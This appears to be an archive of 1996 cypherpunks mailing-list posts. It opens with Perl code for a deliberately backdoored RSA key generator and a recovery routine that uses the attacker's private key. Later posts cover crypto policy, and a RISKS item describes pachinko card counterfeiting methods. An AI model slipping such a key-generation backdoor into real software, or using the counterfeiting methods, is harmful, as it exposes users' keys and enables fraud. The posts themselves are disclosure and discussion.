	46da91f7ada6d83125a15637271bcbfd1d5538bf0b41b81cac9efb892383ef
	8d5de8f989ee143fb1dda17c3b9da382905396503186774348f51741a8feb1

and decrypt this using Mallets private 'd', we get

	4e00dc8ea1c0a55c2f5a5b14fdb05f84ecb1c5d1463562925637624e6f1d94
	5adbc4ed2cb4dd266f8f9c59f6c07d7b3d3ee20328bfdf12f54f654256a63e

which you can see is Joe's P without the leading 0x80 and trailing 0x01



Here is the code (in Perl) that generated Joe's key.
This code contains only Mallets public key.

	my $bits = 512;	# Bits in p and q, not in n

	#
	#	Set up Mallets public key
	#
	my $me = new MPI 17;
	my $mn = restore MPI pack("H*", "ce859f121d419ace45f2a56fafe5ef84ba6144f41901efceb8a889726845dda09c002c7bdf42fd73ca652862ca59be9eee540fccc3041b5ca2205d925633");

	#
	# Note - first byte is 0x80,
	# first bit of second byte is zero
	# to ensure that P is less than Mallets n
	#
	my $p;
	do {
		$p = randomSpecial($bits, "100000000", "00000001");
	} while (!isPrime($p));

	#
	#	Now encrypt P for Mallet
	#
	my $ss = $p->save();	
	substr($ss, 0, 1) = '';	# Remove high and low bytes
	substr($ss, -1, 1) = ''; # since we know what they are
	my $tmp = restore MPI $ss;
	my $s = new MPI;
	MPI::mod_exp($s, $tmp, $me, $mn);
	$s = restore MPI pack("C", 128) . $s->save() . pack("C", 1);

	my $tmp = new MPI;
	my $q = new MPI;

	MPI::lshift($tmp, $s, $bits);
	MPI::add($tmp, $tmp, new MPI 256);	# To prevent Q being too large
	MPI::div($q, new MPI, $tmp, $p);

	do {
		$q->inc();
	} while (!isPrime($q));


	my $e = new MPI 17;
	my $sk = RSAKeyGen::deriveKeys($p, $q, $e);

	#
	#	Save our key
	#
	my $passphrase = "xyzzy";
	my $skc = new SecretKeyCertificate($sk, $passphrase);

	my $fos = new FileOutputStream("secring.pgp");
	my $dos = new DataOutputStream($fos);

	$skc->saveToDataStream($dos);

	my $id = new UserIdPacket 'Joe Sixpack <joe@aol.com>';
	$id->saveToDataStream($dos);



This is the code to recover P from Joes public key
(Mallet's private key is required)

	#
	# Mallets secret key
	#
	my $mn = restore MPI pack("H*", "ce859f121d419ace45f2a56fafe5ef84ba6144f41901efceb8a889726845dda09c002c7bdf42fd73ca652862ca59be9eee540fccc3041b5ca2205d925633");
	my $md = restore MPI pack("H*", "0c25fa4c5c12eafd132c6415a0ef68713823d6e12ea5c2cfecbe9eac607c9475d1b60c2a3aef89438692326d70d88080317b0cd04432d5a0230de572e819");

	my $rp = new MPI;
	my $pe = restore MPI substr($sk->n()->save(), 1, 62);
	MPI::mod_exp($rp, $pe, $md, $mn);	# Decrypt



Gary
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: medea@alpha.c2.org (Medea)
Date: Sun, 2 Jun 1996 10:11:12 +0800
To: cypherpunks@toad.com
Subject: Re: NRC Cryptography Report: The Text of the Recommendations
Message-ID: <199606012130.OAA00695@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Dave Watson wrote:

>Anybody know who the NRC is and whether they have any influence >with anyone?

Dave,

  Maybe the following article might answer your question....

Medea

+++++++++++++++Forwarded Article+++++++++++++++++++

          WASHINGTON (Reuter) - Cryptography, the art and science of secret writing, has long been the province of soldiers, rulers
and spies. But a study for Congress released Thursday said the U.S. government should promote widespread commercial use of such tricks to curb theft of computer data, wireless communications and other electronic information.
          A committee of the National Research Council, which gives science and technology advice under a congressional charter, said a broad use of cryptography would help the United States in many ways including making banking and telecommunications networks more secure and giving individuals greater privacy.
          In a report requested by Congress, the panel said no law should bar the manufacture, sale or use in the United States of any form of encryption -- mathematical formulas to scramble
electronic data to thwart eavesdroppers. Largely siding with
industry in a long tug-of-war with law enforcement officials, it
also said export controls on encryption technologies should be
"progressively relaxed but not eliminated."
          The Clinton administration and its predecessors have
blocked the export of powerful cryptography, fearing it would
hinder officials in thwarting terrorism and counter-espionage.
          Committee chair Kenneth Dam, a law professor at the
University of Chicago, acknowledged that the spread of
encryption technologies would make some law enforcement and
spying tougher for the United States.
          "But the many benefits to society of widespread commercial and private use of cryptography outweigh the disadvantages," he said in a statement accompanying the report, entitled "Cryptography's Role in Securing the Information Society".
          The administration wants to set up government-approved
repositories that keep copies of mathematical keys for decoding
encrypted information so officials can lift the veil on secret
communications if granted a court order.
          Industry executives and privacy advocates strongly oppose such "escrowed" encryption, arguing that reliable coding
technology is critical for commerce and for privacy in the
information age and on the Internet, the worldwide collection of
computer networks.
          In its study, the committee said U.S. policy should take account of national security concerns but should be driven more by market forces than by law.  "Since the committee believes
that widespread deployment and use of cryptography are in the
national interest, it believes that national cryptography policy
should align itself with user needs and market forces to the
maximum feasible extent," it said.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Sun, 2 Jun 1996 09:04:55 +0800
To: Rich Graves <tcmay@got.net>
Subject: Re: WSJ on "IRS-bashing"
Message-ID: <199606012148.OAA24297@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 04:01 PM 5/29/96 -0700, Rich Graves, who lives in a parallel 
universe where political correctness is no threat to liberty, 
and the FBI and BATF no threat to law abiding people wrote:
> any such law
> would be invalidated by R.A.V. v. St. Paul. The only exceptions are
> restrictions on "fighting words" that meet the tests in Chaplinsky v. New
> Hampshire and "hostile working environment" discrimination, which I assume
> is what you're talking about, in some elliptical way.

When I was looking for a house in Oregon, I pointed at the map and asked the 
real estate lady "Why are houses in this area cheap".  She did not give a 
straight answer I pressed her, and then she then started asking me 
questions that indicated she suspected I was an agent provocateur 
from the government trying to entrap her into revealing forbidden information.
I eventually discovered that the area in question was occupied predominantly 
by people of a particular ethnic group, but she was forbidden to tell me this 
information.  This explanation of the price disparity did not occur to me 
until she started feeling me out to see if I was a cop.

But Rich Graves does not regard that sort of thing as any violation on
freedom of speech.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Sun, 2 Jun 1996 07:03:32 +0800
To: ois-news@offshore.com.ai
Subject: Arms Trafficker Page Made CNN!
Message-ID: <Pine.LNX.3.91.960601150934.6641A-100000@offshore>
MIME-Version: 1.0
Content-Type: text/plain




The Offshore Information Services Arms Trafficker page made
CNN Computer Connection just moments ago.  :-)

The page:

    http://online.offshore.com.ai/arms-trafficker/

 is now famous.  :-)

  --  Vince




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sun, 2 Jun 1996 03:32:15 +0800
To: cypherpunks@toad.com
Subject: NRC Report, 7, 8
Message-ID: <199606011617.QAA01878@pipe2.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Part III   Policy Options, Findings and Recommendations 
 
 
   Chapter 7  Policy Options for the Future 
 
      http://pwp.usa.pipeline.com/~jya/nrc07.txt  (124 kb) 
 
 
   Chapter 8  Synthesis, Findings and Recommendations 
 
      http://pwp.usa.pipeline.com/~jya/nrc08.txt  (134 kb) 
 
 
   ---------- 
 
   14 (quite meaty) Appendices later today. 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Fletcher <fletch@ain.bls.com>
Date: Sun, 2 Jun 1996 08:30:34 +0800
To: cypherpunks@toad.com
Subject: Interesting forum on CSPAN
Message-ID: <9606012058.AA24962@outland.ain_dev>
MIME-Version: 1.0
Content-Type: text/plain


	Was channel surfing last night while MST3K was in a commercial
and wound up watching a panel on CSPAN from the World Economic Forum
on "Technology & Security".  The pannelists were Nicholas Negroponte
from MIT's Media Lab, John Barlow from the EFF, a Mike Nelson from the
White House (no relation to MST3K's :), and two other people whom I
can't for the life of me remember their names (one was from a security
consulting firm, and the other was a lawyer from something like the
"Bristol Group").  It was 3am, so sue me. :)

	I missed the first few minutes, but there was a bunch of
administration encryption policy bashing from all sides.  Nelson kept
saying that the administration wanted to support "good strong
encryption" and they wanted to be able to say (paraphrasing) "We think
this is good.  Use this."  (Trust us, we're from a TLA. :) He also
kept saying that (again, paraphrasing) "most encryption out there is
no good".  Which begs the question then why are they wanting to ban
its use and export.  Negroponte kept bringing up the point that their
policy was based on the (flawed, as we all believe) assumption that no
one outside the US could create good crypto.

	Other topics that were touched on were intellectual property
rights and e$.  It was interesting that the lawyer person agreed to a
good extent with a lot of the remarks Barlow made.  Overall it was
pretty interesting (and not just to watch the White House guy squirm
as his premises were invalidated out from under him :).  CSPAN
usually replays stuff like this at odd times during the weekend so
you might want to keep your eyes peeled.

---
Fletch                                                     __`'/|
fletch@ain.bls.com  "Lisa, in this house we obey the       \ o.O'    ______
404 713-0414(w)	     Laws of Thermodynamics!" H. Simpson   =(___)= -| Ack. |
404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43  U      ------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moltar Ramone <jlasser@rwd.goucher.edu>
Date: Sun, 2 Jun 1996 08:39:30 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: NRC Cryptography Report: The Text of the Recommendations
In-Reply-To: <199605311725.KAA21348@mail.pacifier.com>
Message-ID: <Pine.SUN.3.91.960601170005.12262B-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 31 May 1996, jim bell wrote:

> >This is then followed with a couple of pages of justification for why
> >this relaxation of the export policies should be allowed.  Much is made
> >of the fact that people will be more likely to use 56 bit encryption than
> >the 40 bit which is currently allowed.  (This is an example of the
> >perspective issue I mentioned above.)  However, nowhere is it stated why
> >more than 56 bits is not OK, and why it is necessary to forbid repeated
> >use to increase confidentiality.  There is not one word of discussion of
> >this proviso.
> 
> A very curious omission!  It seems to me that if they're trying to explain 
> any sort of limits on encryption, they should focus carefully on WHY those 
> limits should exist, and why, exactly, those limits should be selected at 
> any particular level.

The way it was explained in the press conference is that 56 bit DES was 
their feeling about what business needed now, and that 56 bit DES was 
_not_ a once-and-for-all stopping point, but just an example of "industry 
needs" etc.

What this really means is that they were too chicken to mention PGP.

Jon Lasser
----------
Jon Lasser (410)532-7138                         - Obscenity  is a crutch  for
jlasser@rwd.goucher.edu                            inarticulate motherfuckers.
http://www.goucher.edu/~jlasser/
Finger for PGP key (1024/EC001E4D)               - Fuck the CDA.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sun, 2 Jun 1996 08:52:01 +0800
To: cypherpunks@toad.com
Subject: (Fwd) Developers Directory
Message-ID: <199606012208.SAA24097@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


I got the following 'junk' email so I bit.  They asked for updated 
descriptions of software that I've thrown on the net, along with 
shareware/freeware/GPL/comm. ratings, etc.  Also violence ratings... 
I set all my source codes to "Gruesome" <insert cheesy emoticon here>

Interesting to see what proggies of mine they listed and what they 
didn't.

--Mutant Rob

------- Forwarded Message Follows -------
Date:          Sat, 1 Jun 1996 15:21:29 -0600
From:          Author Database Maintenance <authors@exodus.pht.com>
Subject:       Developers Directory

Dear Author,

We're building a public database called the "Developer's Directory" which
contains information about authors of shareware/freeware programs.
We'd like to include you and some information about your programs. 

We'd sure appreciate it if you'd visit our website and help
us fill in some info.

  http://pacific.pht.com/  [ my info deleted ;]

Since this system is still in the testing phase, we'd like to hear your
comments and suggestions.  Please send them to:
authors@pht.com

Thank you!

Koji Ashida



---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@MIT.EDU>
Date: Sun, 2 Jun 1996 09:22:34 +0800
To: hfinney@shell.portal.com>
Subject: Re: NRC Cryptography Report: The Text of the Recommendations
Message-ID: <9606012215.AA24993@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 10:55 AM 6/1/96 -0700, watson@tds.com wrote:
>Anybody know who the NRC is and whether they have any influence with anyone?

        They have influence in that their reports have a fair amount of
credibility with the extra boost of NAS's "scientific authority." If one
wanted to distinguish what they do with what the OTA did for instance, one
could say that while the OTA generally had a very smart/competent staff (and
had a turbulent, poorly managed history and political troubles) the NRC has
the strength in that it is non-governmental and has the shroud of
"scientific neutrality" about it it could hope to pull from its parent
organization, the NAS.

        The NAS and NRC have interesting histories, the NAS was an honorary
society that had some fundings for it snuck into an appropriations bill back
in 1863, but generally it was not supported by the government aside from
specific "contract" studies which the Congress might ask for. The NRC (known
as the NDRC) was created as an advisory council under NAS to help the
government with munitions research and development during WWI. Since, they
conduct hoc scientific/policy studies to investigate a topic on Congress's
behalf. Their "Realizing the Information Future" that came out a couple of
years ago was highly regarded. 

For history on these topics I recommend:

Hunter Dupree, Sciene in the Federal Government: A History to 1940, Harper &
Row, 1974.

Bruce L. R. Smith, American Science Policy Since World War II, Brookings
Institution, 1990.

>From their WEB page:

National Research Council

   NRC Logo

   The National Research Council was organized by the National Academy of
   Sciences in 1916 to associate the broad community of science and
   technology with the Academy's purposes of further knowledge and
   advising the federal government. Functioning in accordance with
   general policies determined by the Academy, the National Research
   Council has become the principal operating agency of both the National
   Academy of Sciences and the National Academy of Engineering in
   providing services to the government, the public, and the scientific
   and engineering communities. The National Research Council is
   administered jointly by both Academies and the Institute of Medicine.
   Dr. Bruce M. Alberts is the chairman of the National Research Council.


_______________________
Regards,            Real generosity toward the future lies in giving 
                    all to the present. - Albert Camus
Joseph  Reagle      http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Gabb <cea01sig@gold.ac.uk>
Date: Sun, 2 Jun 1996 05:00:34 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: I told you so
In-Reply-To: <199605311928.PAA07729@jekyll.piermont.com>
Message-ID: <Pine.SUN.3.93.960601183545.5168D-100000@scorpio.gold.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 31 May 1996, Perry E. Metzger wrote:

> 
> I retract the following story, it was told to me by a contractor 
> who attended a MBONE group meeting on the MBONE, where the story 
> originated:
> 

I'm greatly heartened by retractions.  Anyone who retracts so promptly
shows a commitment to truth that I admire - and that also inclines me to
believe whatever that person does not retract.  I wish it were a more
common thing.

Sean Gabb.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Gabb <cea01sig@gold.ac.uk>
Date: Sun, 2 Jun 1996 04:58:36 +0800
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: Paper about legal aspects of electronic cash
In-Reply-To: <v03006f05add5cbd1666a@[199.0.65.105]>
Message-ID: <Pine.SUN.3.93.960601184045.5168F-100000@scorpio.gold.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 1 Jun 1996, Robert Hettinga wrote:
> 
> (PostScript, 36 pages, about 370K. The paper is written in German.)
> 
> I'm looking forward to your comments.

I wish I could read German well enough to use the paper.  Will it be
translated into English?

While writing, I have a short paper of my own on money laundering and
digital cash.  It's at:

http://www.gold.ac.uk/~cea01sig/monlaund.htm

Sean Gabb.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sun, 2 Jun 1996 09:51:11 +0800
To: cypherpunks@toad.com
Subject: Saw this on CNN: Anonymous Stock tips over IRC as bad???
Message-ID: <199606012311.TAA25220@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


There was a story on CNN about how anonymous people on IRC (and other 
commercial online chats) giving stock tips is a Bad Thing (tm).  
Actually had some guy saying that a law should ban anonymous 
discussions of stocks online.

Yeesh. What ever happened to caveat emptor?  (Like a recommendation 
on IRC is automatically more trustworthy than overhearing a 
conversation in a public bathroom?)

--Mutant Rob.
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sun, 2 Jun 1996 12:56:35 +0800
To: "Deranged Mutant" <cypherpunks@toad.com
Subject: Re: Saw this on CNN: Anonymous Stock tips over IRC as bad???
Message-ID: <2.2.32.19960602015403.0070d0a0@popmail.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                       SANDY SANDFORT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

C'punks,

At 06:44 PM 6/1/96 +0000, Deranged Mutant wrote:

>There was a story on CNN about how anonymous people on IRC (and other 
>commercial online chats) giving stock tips is a Bad Thing (tm).  
>Actually had some guy saying that a law should ban anonymous 
>discussions of stocks online.
>
>Yeesh. What ever happened to caveat emptor?  (Like a recommendation 
>on IRC is automatically more trustworthy than overhearing a 
>conversation in a public bathroom?)

One of the oldest tricks for running a stock up (or down) is 
to put rumor teams on elevators in the financial district of
major cities.  All day long, they ride up and down elevators
having whispered, but not unintelligable, conversations about
the target company.  Of course, they "accidentally" drop what
sounds like important insider information.  Just think how
much more efficient the Net can be for such activities.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 2 Jun 1996 13:15:58 +0800
To: cypherpunks@toad.com
Subject: Re: Compressed data vulnerable to known-plaintext?
Message-ID: <199606020213.TAA00981@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Someone who claimed to be Mark M. said on Sat, 1 Jun 1996:

    (I said:)
> > Why not simply use two session keys, and encrypt the headers with one 
> > while encrypting the actual data with the other? That seems to solve both 
> > problems, except that more CPU cycles are required.
> 
> An easier solution would be to just strip of the headers.  If the header is
> always the same, then it is redundant.  If it varies, then it cannot be used
> as known-plaintext.

But then you still have the problem of identifying the contents.  If there
were no headers, one could not tell if the message was compressed using
ZIP, LHA, StuffIt, tar*, compress, gzip, Alice's Magical Supercompressor,
or even if it was left alone.  One could also not tell if the decryption
happened successfully.

( * Yes, I know tar is not compression. )





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 2 Jun 1996 13:38:32 +0800
To: cypherpunks@toad.com
Subject: Re: [Off-Topic]  "Curfews"
Message-ID: <add64d13020210048815@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:59 AM 6/2/96, Duncan Frissell wrote:

>Of course curfew laws only control the inarticulate and scruffy.  Well
>dressed children (coat and tie for the boys dress or suit for the girls) who
>can claim that they are out doing tons of protected things like work and
>school and worship and political campaigning and "trying to save street
>children for Jesus" will not be picked up.  They can also say things like

This, by the way, is the main thing that concerns certain civil rights
groups (including the Santa Cruz chapter of the ACLU). They say they'll be
monitoring enforcement patterns to see if more "children of color" are
picked up than their percentage in the population represents.

>"Ossifer, I'm peaceably assembling to petition the government for redress of
>grievances.  It's in the First Amendment.  You could read about it and
>everything."

Personally, I liked my "religious exemption" example. The Baal worshippers
can claim that they are engaging in their religion by grokking the
darkness. If picked up and held, they can claim they are "being held
without Baal."

>to be accused of "owning slaves just like Thomas Jefferson."  Parents can
>also give their kids blanket notes of permission to be out on the streets.
>

Most of the ordinances, including the one here, specifically state that
"blanket permission" by parents is not acceptable. They want _specific_
reasons for being out after curfew.

(It's this taking control from both the kids and their parents and putting
it in the hands of cops that really bugs me.)

By the way, if being out after curfew is breaking the law, can I make a
"citizen's arrest" of some of those nice young chicas in Watsonville?

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Sun, 2 Jun 1996 15:40:30 +0800
To: cypherpunks@toad.com
Subject: RISKS: Pachinko card counterfeiting update
Message-ID: <v01540b00add6cfd2c035@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain


------------------------------

Date: Tue, 28 May 1996 22:09:28 +0900 (JST)
From: Chiaki Ishikawa <ishikawa@personal-media.co.jp>
Subject: re: TILT! Counterfeit pachinko cards ... (Wayner, RISKS-18.15)

I would like to add some background as someone who has played in pachinko
parlors in Japan.  (The origin of the game of pachinko is rather vague.
Some say it is based on the ball game popular after the WW-II in U.S.A..
Anyway, it is a gambling business.)

The card in question acts as a kind of debit card inside the pachinko
parlors.  It was introduced a few years ago by an former police official,
with the expressed intention of keeping the money flow easy to track. (I
would say it was a ruse to make a few companies where the ex-police
officials can find jobs after retirement from the office. But I digress.)

The cards are sold to the pachinko parlors and the customers buy the cards
from the parlors, and obtain steel balls to play the game by inserting the
card into the slot next to the game machine.

Pachinko gambling works as follows.  When you win the game, the number of
steel balls in your possession increases and the customer can exchange the
balls with gifts.  (Therein lies a complication. Japanese law prohibits
gambling, and so exchanging the steel balls with real money is illegal.
*However*, first exchanging the balls with gifts, and then exchanging the
gifts with money at a third party outlet [which is quite likely to be
operated by the parlor owner] has been allowed by the police.) Speaking of
loophole! Some people do bring back the gifts to homes: depending on the
places, parlors carry game-boy cartridges, latest bestseller books, snack
food such as cookies, instant noodles, umbrella, purse, movie video tape,
music CD, to name a few as gifts. But if the customer wants to exchange
his/her win indirectly to money at the outlet, then he/she has to ask for
special gifts used essentially as money tokens by these establishments.
These are often a tiny gold/silver foil embedded in thin plastic slab, etc..
Each parlor/outlet pair uses different stuff. In my hometown, a special
brand of silk stocking was used as money token. This whole thing is a farce
in view of the anti-gambling law in Japan.)

Back to the card: the cards in question are used by two leading card
manufacturers. (There are another couple of late-entry companies whose cards
are not known to be attacked yet.) The card is based on the design done by
NTT Data.  NTT is the Japanese equivalent of old Ma Bell in the USA.  NTT
Data is a company that specializes in computer software integration,
communication and such.  I believe it designs the telephone card (debit card
used for pay-phone in Japan), too.

The pachinko card is the size of name card and plastic.  The details are not
published. To the best of my knowledge, I think there is a magnetic strip
that contains the card ID information such as its serial number and the
amount of debit money.

There were 10,000 yen, 5,000 yen, 3,000 yen, 2,000 yen, and 1,000 yen cards.
(I said "were" because 10,000 yen and 5,000 yen cards are no longer
available.)

Attack method:

>From what I saw and read, the first card verification mechanism used by the
pachinko game machine was so primitive to defy rational explanation: each
time the card was used, a tiny hole was punched to indicate the amount left
in the card. As the customer uses the card, the position of the punched hole
on card shifts toward the zero position. Once there is a hole on the zero
position, the card is no longer usable.

The first simple attack as far as I can tell was to fill in the hole in the
card with tiny plastic (essentially the chaff produced when the hole is
punched was used to fill in the hole).  I am not sure if such simple attack
was possible, but it seemed possible really at the beginning with crude
modification of the magnetic data.

Then, of course, the magnetic information on the card was also modified in
more sophisticated ways when the card was used.

However, the bad people also learned and somebody stole the reader mechanism
and figure out the part of the magnetically-coded information: the result
was that bad people could buy the pristine 10,000 yen card and then uses up
to 2500 yen of the debit amount legally and then "re-fill" the card to 9500
yen worth, thus gaining 2000 yen for free again and again.  (Until 3000 yen
was used from the 10,000 yen card, the physical hole was not produced on the
card, and only the magnetic information was changed. Hence the mere
counterfeiting of the magnetic information was necessary to "revive" the
card. No physical re-filling of the card was necessary. Physically
re-filling the hole is easy to spot visually and was avoided by the bad
guys.)

[I have to confess that the exact amount involved in the counterfeiting
is a little uncertain. But the general idea still holds.]

Similar attack was possible with 5,000 yen card.

Presumably the gain by attacking 3,000 yen, 2,000 yen and 1,000 yen card was
small compared with the risk, the bad guys didn't attack these cards until
lately.

Now the situation is that of cats and mouse.  New counterfeiting
methods and counter-measures follow each other in rapid succession.

I believe that the cloning of the card was also done. But I don't know the
details.

Now, the card companies and pachinko parlors stopped issuing 10,000 yen and
5,000 yen cards because the damage was so large.

Also, they have installed special readers to verify the validity of the card
by incorporating more vigourous checking not available on the readers next
to the game machine: it used to be that the cards sold could by used by any
pachinko parlors in Japan. Now cards sold elsewhere have to be verified with
this machine before used at a local game parlor. Cards sold at the local
parlor can be used without such checking.

Already, there are reports of counterfeit-card usage:

 - either the cards are so sophisticated that they can pass the enhanced
   reader.
 - Or the bad guys buy the cards locally and then use some of the
   debit amount and then bring the cards to their factory to re-fill
   and re-use it at the local store again and again.

The card companies have installed countermeasures in selected stores to the
cloning of the card by checking the serial number of the card and stopped
the operation of the whole game machines in the store if a card with the
serial number of the previously used (finished?) card is ever inserted into
the game machine.

Another simple method of fooling the reader was also reported about a month
ago. Essentially, it cuts out a long strip of the 3,000 yen card (now the
most expensive card after 10,000 yen and 5,000 yen card are gone) and
rotates the strip to invert its direction and then reassembles the card
again using cement or something. To my surprise, it was reported to be
deemed valid by some readers (!?). Apparently some readers only check for
the position of the hole on fixed position and fooled to believe the card is
valid if the hole is not in the expected position, etc.. Once not so
rigorous readers are distributed, it is very difficult to upgrade all of
them in Japan, I guess.

The problem is complicated in that the counterfeiting only damages the card
company. The parlors report the amount of debit money used in their shops
and then compensated for the amount (less the small surcharge by the card
company.)  This means that every time the counterfeit card is used the card
company alone loses money and the local parlor doesn't lose.

There have already been reports of the owners of the pachinko parlors
involved in the usage of the counterfeit cards.  These bad owners allowed
the bad guys to use the counterfeit cards in their parlors and pass the used
debit amount to the card company and getting compensated.

In these cases, the bad guys bring back the money (by simply exchanging the
phony debit money into the steel balls, and then without playing (they can
play if they wish), exchange the steel balls to the special gifts, and then
exchange the gifts with money. [Usually, buying the steel balls and then
exchanging them with gifts, and subsequently with money leaves you less
money than you started with. The house always wins. In this case, the bad
guys started out with counterfeit debit money and ends up with real money,
so it is OK for the bad guys.] The parlor also gets the money for the used
debit money. So they win, too.  Only the card companies lose.

Counterfeiting probably has existed since the first money (or equivalent)
was ever invented.  But, it surprised me that NTT Data approached the whole
scheme so naively, especially since there have been reports of telephone
card counterfeiting in Japan before.  Some of the counterfeiting methods
reported seemed so simple, and I have a doubt whether NTT Data was serious
enough to deter counterfeiting.

At least, I can safely say they have underestimated the ingenuity of the
counterfeiters badly and didn't learn from the counterfeiting of telephone
cards very well.

Ishikawa, Chiaki  (family name, given name)
Personal Media Corp., Shinagawa, Tokyo, Japan 142 ishikawa@personal-media.co.jp


-------------------------------------------------------------------------
Steven Weller                      |  Technology (n):
                                   |
                                   |     A substitute for adulthood.
stevenw@best.com                   |     Popular with middle-aged men.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Sun, 2 Jun 1996 15:28:42 +0800
To: cypherpunks@toad.com
Subject: RISKS: Pachinko card counterfeit background
Message-ID: <v01540b00add6d330aae6@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain



------------------------------

Date: Tue, 28 May 1996 22:09:28 +0900 (JST)
From: Chiaki Ishikawa <ishikawa@personal-media.co.jp>
Subject: re: TILT! Counterfeit pachinko cards ... (Wayner, RISKS-18.15)

I would like to add some background as someone who has played in pachinko
parlors in Japan.  (The origin of the game of pachinko is rather vague.
Some say it is based on the ball game popular after the WW-II in U.S.A..
Anyway, it is a gambling business.)

The card in question acts as a kind of debit card inside the pachinko
parlors.  It was introduced a few years ago by an former police official,
with the expressed intention of keeping the money flow easy to track. (I
would say it was a ruse to make a few companies where the ex-police
officials can find jobs after retirement from the office. But I digress.)

The cards are sold to the pachinko parlors and the customers buy the cards
from the parlors, and obtain steel balls to play the game by inserting the
card into the slot next to the game machine.

Pachinko gambling works as follows.  When you win the game, the number of
steel balls in your possession increases and the customer can exchange the
balls with gifts.  (Therein lies a complication. Japanese law prohibits
gambling, and so exchanging the steel balls with real money is illegal.
*However*, first exchanging the balls with gifts, and then exchanging the
gifts with money at a third party outlet [which is quite likely to be
operated by the parlor owner] has been allowed by the police.) Speaking of
loophole! Some people do bring back the gifts to homes: depending on the
places, parlors carry game-boy cartridges, latest bestseller books, snack
food such as cookies, instant noodles, umbrella, purse, movie video tape,
music CD, to name a few as gifts. But if the customer wants to exchange
his/her win indirectly to money at the outlet, then he/she has to ask for
special gifts used essentially as money tokens by these establishments.
These are often a tiny gold/silver foil embedded in thin plastic slab, etc..
Each parlor/outlet pair uses different stuff. In my hometown, a special
brand of silk stocking was used as money token. This whole thing is a farce
in view of the anti-gambling law in Japan.)

Back to the card: the cards in question are used by two leading card
manufacturers. (There are another couple of late-entry companies whose cards
are not known to be attacked yet.) The card is based on the design done by
NTT Data.  NTT is the Japanese equivalent of old Ma Bell in the USA.  NTT
Data is a company that specializes in computer software integration,
